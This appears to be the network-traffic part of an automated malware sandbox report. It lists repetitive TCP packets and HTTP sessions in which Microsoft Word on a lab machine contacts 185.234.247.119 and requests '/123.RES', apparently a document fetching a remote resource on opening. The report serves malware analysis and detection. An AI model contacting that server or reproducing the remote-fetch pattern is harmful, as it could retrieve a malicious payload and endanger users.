                                                                                                                                                                      Jun 7, 2022 18:45:12.033085108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033108950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033128977 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033133030 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033155918 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033160925 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033185005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033209085 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033221960 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033236027 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033261061 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033271074 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033284903 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033293009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.033309937 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.033335924 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034435034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034467936 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034498930 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034506083 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034524918 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034548044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034548998 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034576893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034601927 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034626007 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034627914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034648895 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034661055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034676075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034698009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034713984 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034718990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034739971 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.034749985 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.034792900 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035362005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035392046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035418034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035443068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035465956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035470009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035490990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035509109 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035515070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035540104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035562992 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035563946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035590887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035600901 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035614967 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035638094 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035640001 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.035701990 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.035973072 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036001921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036026001 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036048889 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036062956 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036076069 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036099911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036107063 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036123991 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036145926 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036149025 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036168098 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036190987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036207914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036215067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036236048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.036247969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.036290884 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.054375887 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058554888 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058593035 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058617115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058641911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058669090 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058686018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058691978 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058703899 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058717012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058743000 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058768034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058773994 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058793068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058820009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058840990 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.058842897 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.058878899 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.060990095 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061017990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061037064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061091900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061125040 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061129093 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061146975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061163902 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061181068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061194897 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061198950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061220884 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061220884 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061242104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061259031 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061268091 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061290979 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062242985 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062278032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062300920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062329054 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062352896 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062365055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062374115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062391043 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062391043 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062408924 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062426090 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062446117 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062454939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062473059 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062499046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062500954 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062535048 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.065588951 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065644026 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065671921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065695047 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065715075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065718889 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.065737963 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065758944 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.065763950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065788984 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065812111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065814972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.065834045 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065869093 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065885067 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.065895081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.065926075 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066353083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066375017 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066392899 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066415071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066433907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066452980 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066452980 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066478014 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066498041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066509962 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066521883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066540956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066551924 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066557884 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066577911 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066586018 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066606045 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.066607952 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.066648006 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067121029 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067140102 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067157984 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067176104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067194939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067208052 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067213058 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067230940 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067248106 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067257881 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067265987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067276001 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067285061 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067297935 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067301989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067320108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.067325115 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.067358971 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068653107 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068674088 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068686962 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068706989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068732977 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068757057 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068763018 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068777084 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068789005 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068795919 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068814993 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068815947 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068840027 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068845987 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068864107 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068886995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.068892002 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.068931103 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.069025040 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069042921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069061041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069078922 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069096088 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069113970 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069118023 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.069132090 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069149971 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069164038 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.069174051 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069188118 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.069196939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069215059 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.069243908 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.169950962 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:13.326630116 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:13.326803923 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:13.328548908 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:13.356384039 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:19.053164005 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:19.053328991 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:47.458700895 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:47.486160994 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:46:17.070538998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:46:17.070729017 CEST4978180192.168.2.4185.234.247.119

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • 185.234.247.119

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.449752185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 18:44:03.661154032 CEST847OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.689259052 CEST847INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:03 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 18:44:03.797730923 CEST848OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.825808048 CEST848INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:03 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:06.937927008 CEST1205OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.195615053 CEST1205OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.224698067 CEST1205INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 18:44:08.227951050 CEST1215OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.256129026 CEST1215INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
